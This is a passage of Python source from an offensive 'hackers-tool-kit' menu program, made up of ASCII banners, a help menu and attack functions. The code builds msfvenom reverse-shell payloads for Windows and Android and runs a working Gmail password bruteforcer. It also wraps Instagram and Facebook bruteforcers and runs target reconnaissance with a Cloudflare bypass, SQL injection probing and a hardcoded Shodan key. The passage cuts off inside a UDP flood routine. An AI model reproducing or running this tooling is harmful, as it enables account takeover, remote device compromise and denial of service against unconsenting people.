+██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + .---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') +def mainbanner18(): + print """ + Type \033[31m?\033[0m For\033[31m Help\033[0m +\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ +║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ +║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m +║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ +║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ +╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ + """.decode('utf-8') +def mainbanner19(): + print """\033[31m + # # + # # + %# \033[0m@tuf_unkn0wn\033[31m ## + ,%/ /%, + %## ##% + &%## ##%& + ,%%#####/. ,/#####%%, + %&%%#####/ \033[0m████\033[31m /#####%%&% + .&&%%%&& \033[0m████\033[31m &&%%%&&. + /&%( \033[0m████\033[31m (%&( + \033[0m████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ +██ \033[0m██████████████████████████████\033[31m ██ +███████ \033[0m██████████████████████████████\033[31m ███████ +██ ██ \033[0m████ \033[31m ██ ██ + ██████ \033[0m████ \033[31m ██████ + ▒ ▓▒ ▒ ▒ ▓▒ ▒ + ░ ▒ ░ ██████ ░ ▒ ░ + ░ ░ ██ ░ ░ + ███████ + ██ ██ + ██████ + ▒ ▓▒ ▒ + ░ ▒ ░ + ░ ░\033[0m + """.decode('utf-8') +def mainbanner20(): + print """ + + + ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ + ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ +██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ +╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ + ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ + ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ + Created by @tuf_unkn0wn type ? for help + + """.decode('utf-8') +def mainbanner21(): + os.system("cat /root/hackers-tool-kit/tools/venombanner.txt") + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,21) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() + if num == 18: + mainbanner18() + if num == 19: + mainbanner19() + if num == 20: + mainbanner20() + if num == 21: + mainbanner21() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +update : update the hackers-tool-kit +clear : clears screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (info gathering tool) +nano : open nano text editor +compilec: compile a c file +dnsspoof: dns spoofing [type dnsspoofall to spoof entire subnet] +htk-lite: run a lighter version of hackers-tool-kit +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + print "\033[1m\033[33m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" + k = raw_input("MODE> ") + ma = 'python3 /root/hackers-tool-kit/tools/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on 